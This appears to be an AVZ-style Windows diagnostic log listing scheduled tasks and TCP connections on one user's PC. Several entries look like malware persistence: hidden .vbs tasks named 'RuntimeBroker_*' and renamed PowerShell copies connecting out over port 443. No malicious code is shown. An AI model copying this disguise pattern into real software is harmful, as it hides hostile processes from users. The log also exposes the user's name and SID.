  C:\WINDOWS\system32\Tasks\Microsoft\Windows\UpdateOrchestrator\%systemroot%\system32\MusNotification.exe Display
C:\WINDOWS\system32\MusNotification.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Reboot
Script: Delete scheduler task
  C:\WINDOWS\system32\Tasks\Microsoft\Windows\UpdateOrchestrator\%systemroot%\system32\MusNotification.exe ReadyToReboot
C:\WINDOWS\system32\MusNotification.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Reboot_AC
Script: Delete scheduler task
  C:\WINDOWS\system32\Tasks\Microsoft\Windows\UpdateOrchestrator\%systemroot%\system32\MusNotification.exe /RunOnAC RebootDialog
C:\WINDOWS\system32\MusNotification.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x64Reboot_Battery
Script: Delete scheduler task
  C:\WINDOWS\system32\Tasks\Microsoft\Windows\UpdateOrchestrator\%systemroot%\system32\MusNotification.exe /RunOnBattery RebootDialog
C:\WINDOWS\system32\MusNotification.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x64USO_UxBroker
Script: Delete scheduler task
  C:\WINDOWS\system32\Tasks\Microsoft\Windows\UpdateOrchestrator\%systemroot%\system32\MusNotification.exe
C:\WINDOWS\system32\MusNotification.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x64USO_UxBroker_Display
Script: Delete scheduler task
  C:\WINDOWS\system32\Tasks\Microsoft\Windows\UpdateOrchestrator\%systemroot%\system32\MusNotification.exe Display
C:\WINDOWS\system32\MusNotification.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x64USO_UxBroker_ReadyToReboot
Script: Delete scheduler task
  C:\WINDOWS\system32\Tasks\Microsoft\Windows\UpdateOrchestrator\%systemroot%\system32\MusNotification.exe ReadyToReboot
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe
1611.37 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33
Script: Quarantine, Delete, Delete via BC
x64Windows Defender Cache Maintenance
Script: Delete scheduler task
Microsoft Malware Protection Command Line Utility© Microsoft Corporation. All rights reserved.C:\WINDOWS\system32\Tasks\Microsoft\Windows\Windows Defender\C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe -IdleTask -TaskName WdCacheMaintenance
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe
1611.37 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33
Script: Quarantine, Delete, Delete via BC
x64Windows Defender Cleanup
Script: Delete scheduler task
Microsoft Malware Protection Command Line Utility© Microsoft Corporation. All rights reserved.C:\WINDOWS\system32\Tasks\Microsoft\Windows\Windows Defender\C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe -IdleTask -TaskName WdCleanup
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe
1611.37 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33
Script: Quarantine, Delete, Delete via BC
x64Windows Defender Scheduled Scan
Script: Delete scheduler task
Microsoft Malware Protection Command Line Utility© Microsoft Corporation. All rights reserved.C:\WINDOWS\system32\Tasks\Microsoft\Windows\Windows Defender\C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe Scan -ScheduleJob -ScanTrigger 55 -IdleScheduledJob
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe
1611.37 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33
Script: Quarantine, Delete, Delete via BC
x64Windows Defender Verification
Script: Delete scheduler task
Microsoft Malware Protection Command Line Utility© Microsoft Corporation. All rights reserved.C:\WINDOWS\system32\Tasks\Microsoft\Windows\Windows Defender\C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe -IdleTask -TaskName WdVerification
C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
6.44 kb, rsAh, created: 22.04.2020 12:25:01, modified: 23.07.2023 13:23:27
Script: Quarantine, Delete, Delete via BC
x64NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
Script: Delete scheduler task
  C:\WINDOWS\system32\Tasks\C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
WorkingDirectory=C:\Program Files\NVIDIA Corporation\NvContainer
C:\Users\Isaac\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
4028.92 kb, rsAh, created: 22.04.2020 08:12:15, modified: 22.07.2023 00:30:13
Script: Quarantine, Delete, Delete via BC
x64OneDrive Reporting Task-S-1-5-21-1347779806-3341832456-1933409962-1001
Script: Delete scheduler task
Standalone Updater© Microsoft Corporation. All rights reserved.C:\WINDOWS\system32\Tasks\%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
C:\Users\Isaac\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
4028.92 kb, rsAh, created: 22.04.2020 08:12:15, modified: 22.07.2023 00:30:13
Script: Quarantine, Delete, Delete via BC
x64OneDrive Standalone Update Task-S-1-5-21-1347779806-3341832456-1933409962-1001
Script: Delete scheduler task
Standalone Updater© Microsoft Corporation. All rights reserved.C:\WINDOWS\system32\Tasks\%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
C:\Users\Isaac\AppData\Local\Programs\Opera GX\launcher.exe
2584.40 kb, rsAh, created: 06.06.2020 02:00:07, modified: 25.06.2023 16:01:17
Script: Quarantine, Delete, Delete via BC
x64Opera GX scheduled assistant Autoupdate 1615911360
Script: Delete scheduler task
Opera GX Internet BrowserCopyright Opera Software 2023C:\WINDOWS\system32\Tasks\C:\Users\Isaac\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Isaac\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
C:\Users\Isaac\AppData\Local\Programs\Opera GX\launcher.exe
2584.40 kb, rsAh, created: 06.06.2020 02:00:07, modified: 25.06.2023 16:01:17
Script: Quarantine, Delete, Delete via BC
x64Opera GX scheduled Autoupdate 1591426805
Script: Delete scheduler task
Opera GX Internet BrowserCopyright Opera Software 2023C:\WINDOWS\system32\Tasks\C:\Users\Isaac\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe
2579.51 kb, rsAh, created: 16.07.2023 07:11:00, modified: 16.07.2023 07:11:00
Script: Quarantine, Delete, Delete via BC
x64Overwolf Updater Task
Script: Delete scheduler task
OverwolfUpdaterCopyright Overwolf © 2023C:\WINDOWS\system32\Tasks\C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe /RunningFrom Schedule
WorkingDirectory=C:\Program Files (x86)\Overwolf
C:\Users\Isaac\AppData\Roaming\kKGAC.vbs
0.14 kb, rsAh, created: 11.04.2023 21:19:46, modified: 11.04.2023 21:19:46
Script: Quarantine, Delete, Delete via BC
x64RuntimeBroker_kKGAC
Script: Delete scheduler task
  C:\WINDOWS\system32\Tasks\C:\Users\Isaac\AppData\Roaming\kKGAC.vbs
C:\Users\Isaac\AppData\Roaming\tDSul.vbs
0.13 kb, rsAh, created: 04.04.2023 21:18:06, modified: 04.04.2023 21:18:06
Script: Quarantine, Delete, Delete via BC
x64RuntimeBroker_tDSul
Script: Delete scheduler task
  C:\WINDOWS\system32\Tasks\C:\Users\Isaac\AppData\Roaming\tDSul.vbs
C:\Program Files (x86)\GIGABYTE\SmartSurvey\GbtCareBotCmd.exe
136.42 kb, rsAh, created: 06.09.2018 15:53:02, modified: 06.09.2018 15:53:02
Script: Quarantine, Delete, Delete via BC
x64SmartSurvey
Script: Delete scheduler task
GbtCareBotCmdCopyright © 2018 GIGA-BYTE TECHNOLOGY CO., LTD.C:\WINDOWS\system32\Tasks\"C:\Program Files (x86)\GIGABYTE\SmartSurvey\GbtCareBotCmd.exe" -u
D:\TaskbarX_1.6.2.0\TaskbarX.exe
error getting file info
Script: Quarantine, Delete, Delete via BC
x64TaskbarX
Script: Delete scheduler task
  C:\WINDOWS\system32\Tasks\D:\TaskbarX_1.6.2.0\TaskbarX.exe -tbs=1 -color=16;0;52;100 -as=backeaseout -obas=cubiceaseinout -asp=300 -ptbo=0 -stbo=0 -lr=400 -oblr=400 -sr=0 -ftotc=1 -dtbsowm=1
C:\Program Files\Nefarius Software Solutions\ViGEm Bus Driver\ViGEmBus_Updater.exe
1090.91 kb, rsAh, created: 27.09.2022 09:16:59, modified: 27.09.2022 09:16:59
Script: Quarantine, Delete, Delete via BC
x64ViGEmBus_Updater
Script: Delete scheduler task
ViGEmBus_Updater 1.21.442Copyright (C) 2022 Nefarius Software Solutions e.U.C:\WINDOWS\system32\Tasks\C:\Program Files\Nefarius Software Solutions\ViGEm Bus Driver\ViGEmBus_Updater.exe /silent
WorkingDirectory=C:\Program Files\Nefarius Software Solutions\ViGEm Bus Driver\
Items found - 150, recognized as trusted - 120

Namespace providers (NSP)

Manufacturer Status EXE file Redirector Description Manufacturer GUID
Items found - 14, recognized as trusted - 14

Transport protocol providers (TSP, LSP)

Protocol Name EXE file Redirector Description Manufacturer
Items found - 28, recognized as trusted - 28

TCP/UDP ports

Port Status Remote Host Remote Port Application Redirector Notes Description Manufacturer
TCP ports
445LISTENING0.0.0.00System [4]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64Microsoft NET  
2869LISTENING0.0.0.00System [4]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64   
5357LISTENING0.0.0.00System [4]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64   
27036LISTENING0.0.0.00c:\program files (x86)\steam\steam.exe [13792]
4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18
Script: Quarantine, Delete, Delete via BC, Terminate
x64 SteamCopyright (C) 2021 Valve Corporation
49665LISTENING0.0.0.00wininit.exe [1092]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64   
49737LISTENING0.0.0.00services.exe [1168]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64   
49928LISTENING0.0.0.00d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136]
8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
49929LISTENING0.0.0.00d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136]
8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
6463LISTENING0.0.0.00c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe [1344]
133346.27 kb, rsAh, created: 12.07.2023 17:42:13, modified: 12.07.2023 17:42:13
Script: Quarantine, Delete, Delete via BC, Terminate
x64 DiscordCopyright (c) 2023 Discord Inc. All rights reserved.
6463ESTABLISHED127.0.0.150960c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe [1344]
133346.27 kb, rsAh, created: 12.07.2023 17:42:13, modified: 12.07.2023 17:42:13
Script: Quarantine, Delete, Delete via BC, Terminate
x64 DiscordCopyright (c) 2023 Discord Inc. All rights reserved.
8612LISTENING0.0.0.00System [4]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64   
9009LISTENING0.0.0.00System [4]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64   
9010LISTENING0.0.0.00c:\program files\lghub\lghub_agent.exe [18324]
46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 LGHUB AgentCopyright © Logitech, Inc. 2023
9010ESTABLISHED127.0.0.149984c:\program files\lghub\lghub_agent.exe [18324]
46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 LGHUB AgentCopyright © Logitech, Inc. 2023
9010ESTABLISHED127.0.0.149992c:\program files\lghub\lghub_agent.exe [18324]
46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 LGHUB AgentCopyright © Logitech, Inc. 2023
9080LISTENING0.0.0.00c:\program files\lghub\lghub_agent.exe [18324]
46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 LGHUB AgentCopyright © Logitech, Inc. 2023
9100LISTENING0.0.0.00c:\program files\lghub\lghub_updater.exe [6160]
10341.75 kb, rsAh, created: 23.06.2023 12:22:50, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 LGHUB UpdaterCopyright © Logitech, Inc. 2023
9100ESTABLISHED127.0.0.149990c:\program files\lghub\lghub_updater.exe [6160]
10341.75 kb, rsAh, created: 23.06.2023 12:22:50, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 LGHUB UpdaterCopyright © Logitech, Inc. 2023
9180LISTENING0.0.0.00c:\program files\lghub\lghub_updater.exe [6160]
10341.75 kb, rsAh, created: 23.06.2023 12:22:50, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 LGHUB UpdaterCopyright © Logitech, Inc. 2023
27015LISTENING0.0.0.00c:\program files\common files\apple\mobile device support\applemobiledeviceservice.exe [6140]
100.84 kb, rsAh, created: 08.10.2022 03:00:46, modified: 08.10.2022 03:00:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64Half-LifeMobileDeviceService© 2022 Apple Inc. All rights reserved.
27060LISTENING0.0.0.00c:\program files (x86)\steam\steam.exe [13792]
4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18
Script: Quarantine, Delete, Delete via BC, Terminate
x64 SteamCopyright (C) 2021 Valve Corporation
45654LISTENING0.0.0.00c:\program files\lghub\lghub_agent.exe [18324]
46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 LGHUB AgentCopyright © Logitech, Inc. 2023
49675ESTABLISHED127.0.0.15354c:\program files\common files\apple\mobile device support\applemobiledeviceservice.exe [6140]
100.84 kb, rsAh, created: 08.10.2022 03:00:46, modified: 08.10.2022 03:00:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 MobileDeviceService© 2022 Apple Inc. All rights reserved.
49676ESTABLISHED127.0.0.15354c:\program files\common files\apple\mobile device support\applemobiledeviceservice.exe [6140]
100.84 kb, rsAh, created: 08.10.2022 03:00:46, modified: 08.10.2022 03:00:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 MobileDeviceService© 2022 Apple Inc. All rights reserved.
49914ESTABLISHED127.0.0.149915d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136]
8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
49915ESTABLISHED127.0.0.149914d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136]
8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
49930ESTABLISHED127.0.0.149931d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136]
8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
49931ESTABLISHED127.0.0.149930d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136]
8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
49984ESTABLISHED127.0.0.19010c:\program files\lghub\system_tray\lghub_system_tray.exe [17900]
21525.25 kb, rsAh, created: 23.06.2023 12:22:50, modified: 23.06.2023 12:22:47
Script: Quarantine, Delete, Delete via BC, Terminate
x64 G HUBCopyright © Logitech, Inc. 2023
49990ESTABLISHED127.0.0.19100c:\program files\lghub\lghub_agent.exe [18324]
46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 LGHUB AgentCopyright © Logitech, Inc. 2023
49992ESTABLISHED127.0.0.19010c:\program files\lghub\lghub.exe [17472]
148462.75 kb, rsAh, created: 23.06.2023 12:22:48, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 LGHUBCopyright (c) Logitech, Inc. 2023
50879LISTENING0.0.0.00c:\program files (x86)\steam\steam.exe [13792]
4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18
Script: Quarantine, Delete, Delete via BC, Terminate
x64 SteamCopyright (C) 2021 Valve Corporation
50879ESTABLISHED127.0.0.150891c:\program files (x86)\steam\steam.exe [13792]
4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18
Script: Quarantine, Delete, Delete via BC, Terminate
x64 SteamCopyright (C) 2021 Valve Corporation
50880LISTENING0.0.0.00c:\program files (x86)\steam\steam.exe [13792]
4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18
Script: Quarantine, Delete, Delete via BC, Terminate
x64 SteamCopyright (C) 2021 Valve Corporation
50880ESTABLISHED127.0.0.150890c:\program files (x86)\steam\steam.exe [13792]
4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18
Script: Quarantine, Delete, Delete via BC, Terminate
x64 SteamCopyright (C) 2021 Valve Corporation
50890ESTABLISHED127.0.0.150880c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe [5312]
6992.35 kb, rsAh, created: 29.04.2020 11:57:29, modified: 21.07.2023 14:04:22
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Steam Client WebHelperCopyright (C) 2014 Valve Corporation
50891ESTABLISHED127.0.0.150879c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe [5312]
6992.35 kb, rsAh, created: 29.04.2020 11:57:29, modified: 21.07.2023 14:04:22
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Steam Client WebHelperCopyright (C) 2014 Valve Corporation
50960ESTABLISHED127.0.0.16463c:\program files\lghub\lghub_agent.exe [18324]
46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 LGHUB AgentCopyright © Logitech, Inc. 2023
53706SYN_SENT127.0.0.128194c:\program files\lghub\lghub_agent.exe [18324]
46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 LGHUB AgentCopyright © Logitech, Inc. 2023
139LISTENING0.0.0.00System [4]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64Microsoft NET  
8612LISTENING0.0.0.00System [4]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64   
9009LISTENING0.0.0.00System [4]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64   
49822ESTABLISHED192.168.0.120445System [4]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64   
49920ESTABLISHED157.240.249.17443d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136]
8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
49932ESTABLISHED157.240.249.17443d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136]
8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
50874TIME_WAIT34.120.195.249443  [0]
x64   
50878ESTABLISHED162.159.136.234443c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe [9212]
133346.27 kb, rsAh, created: 12.07.2023 17:42:13, modified: 12.07.2023 17:42:13
Script: Quarantine, Delete, Delete via BC, Terminate
x64 DiscordCopyright (c) 2023 Discord Inc. All rights reserved.
50884ESTABLISHED162.254.193.10227028c:\program files (x86)\steam\steam.exe [13792]
4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18
Script: Quarantine, Delete, Delete via BC, Terminate
x64 SteamCopyright (C) 2021 Valve Corporation
50924ESTABLISHED35.186.224.47443c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe [9212]
133346.27 kb, rsAh, created: 12.07.2023 17:42:13, modified: 12.07.2023 17:42:13
Script: Quarantine, Delete, Delete via BC, Terminate
x64 DiscordCopyright (c) 2023 Discord Inc. All rights reserved.
51044ESTABLISHED104.20.68.143443c:\users\isaac\appdata\roaming\tdsul.bat.exe [15860]
411.00 kb, rSaH, created: 23.07.2023 02:12:17, modified: 07.05.2022 00:20:22
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Windows PowerShell© Microsoft Corporation. All rights reserved.
51064ESTABLISHED104.20.68.143443c:\users\isaac\appdata\roaming\tmaie.bat.exe [13932]
411.00 kb, rSaH, created: 11.04.2023 21:19:39, modified: 07.05.2022 00:20:22
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Windows PowerShell© Microsoft Corporation. All rights reserved.
51617TIME_WAIT72.21.81.20080  [0]
x64   
51939ESTABLISHED40.83.247.108443c:\program files (x86)\microsoft\edge\application\msedge.exe [17488]
3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Microsoft EdgeCopyright Microsoft Corporation. All rights reserved.
51949ESTABLISHED192.168.0.558008c:\program files (x86)\microsoft\edge\application\msedge.exe [17488]
3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Microsoft EdgeCopyright Microsoft Corporation. All rights reserved.
51967ESTABLISHED192.168.0.558009c:\program files (x86)\microsoft\edge\application\msedge.exe [17488]
3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Microsoft EdgeCopyright Microsoft Corporation. All rights reserved.
51971TIME_WAIT8.8.8.8443  [0]
x64   
52021ESTABLISHED192.168.0.558009c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
52025ESTABLISHED142.251.166.1885228c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
52036TIME_WAIT142.250.191.133443  [0]
x64   
52042ESTABLISHED192.168.0.1458009c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
52043ESTABLISHED192.168.0.1968009c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
52069ESTABLISHED192.168.0.1918009c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
52079ESTABLISHED192.168.0.1178009c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
52096TIME_WAIT8.8.4.4443  [0]
x64   
52097TIME_WAIT172.217.0.174443  [0]
x64   
52106ESTABLISHED31.13.93.49443d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136]
8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
52122ESTABLISHED52.96.66.162443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
52133TIME_WAIT52.96.164.162443  [0]
x64   
52161TIME_WAIT172.217.0.170443  [0]
x64   
52168TIME_WAIT142.250.190.106443  [0]
x64   
52218TIME_WAIT142.250.191.195443  [0]
x64   
52220TIME_WAIT142.250.191.209443  [0]
x64   
52293TIME_WAIT172.217.4.195443  [0]
x64   
52296TIME_WAIT142.250.190.10443  [0]
x64   
52307TIME_WAIT52.96.79.162443  [0]
x64   
52308TIME_WAIT52.96.79.162443  [0]
x64   
52311TIME_WAIT52.96.226.130443  [0]
x64   
52314TIME_WAIT52.154.48.127443  [0]
x64   
52318TIME_WAIT52.111.227.1443  [0]
x64   
52322ESTABLISHED52.111.227.1443c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
52346TIME_WAIT142.250.190.13443  [0]
x64   
52349TIME_WAIT108.157.150.91443  [0]
x64   
52358TIME_WAIT142.250.190.10443  [0]
x64   
52363TIME_WAIT172.217.1.110443  [0]
x64   
52364TIME_WAIT172.217.4.200443  [0]
x64   
52368TIME_WAIT142.250.123.157443  [0]
x64   
52374TIME_WAIT142.250.190.132443  [0]
x64   
52380TIME_WAIT23.220.161.580  [0]
x64   
52434TIME_WAIT104.69.95.3280  [0]
x64   
52542TIME_WAIT192.229.211.10880  [0]
x64   
52573TIME_WAIT142.250.190.46443  [0]
x64   
52574TIME_WAIT142.250.190.33443  [0]
x64   
52587TIME_WAIT13.107.246.38443  [0]
x64   
52590TIME_WAIT13.107.246.38443  [0]
x64   
52592TIME_WAIT13.107.246.38443  [0]
x64   
52595TIME_WAIT13.107.246.38443  [0]
x64   
52596TIME_WAIT13.107.246.38443  [0]
x64   
52602TIME_WAIT13.107.246.38443  [0]
x64   
52606TIME_WAIT13.107.246.38443  [0]
x64   
52607TIME_WAIT20.190.155.67443  [0]
x64   
52608TIME_WAIT20.118.198.37443  [0]
x64   
52610TIME_WAIT13.107.246.38443  [0]
x64   
52611TIME_WAIT20.44.10.123443  [0]
x64   
52613TIME_WAIT13.107.246.38443  [0]
x64   
52614TIME_WAIT13.107.246.38443  [0]
x64   
52615TIME_WAIT20.44.10.123443  [0]
x64   
52637TIME_WAIT35.227.233.104443  [0]
x64   
52642ESTABLISHED52.96.79.114443c:\program files (x86)\microsoft\edge\application\msedge.exe [17488]
3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Microsoft EdgeCopyright Microsoft Corporation. All rights reserved.
52643ESTABLISHED20.190.155.100443c:\program files (x86)\microsoft\edge\application\msedge.exe [17488]
3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Microsoft EdgeCopyright Microsoft Corporation. All rights reserved.
52646TIME_WAIT172.217.4.200443  [0]
x64   
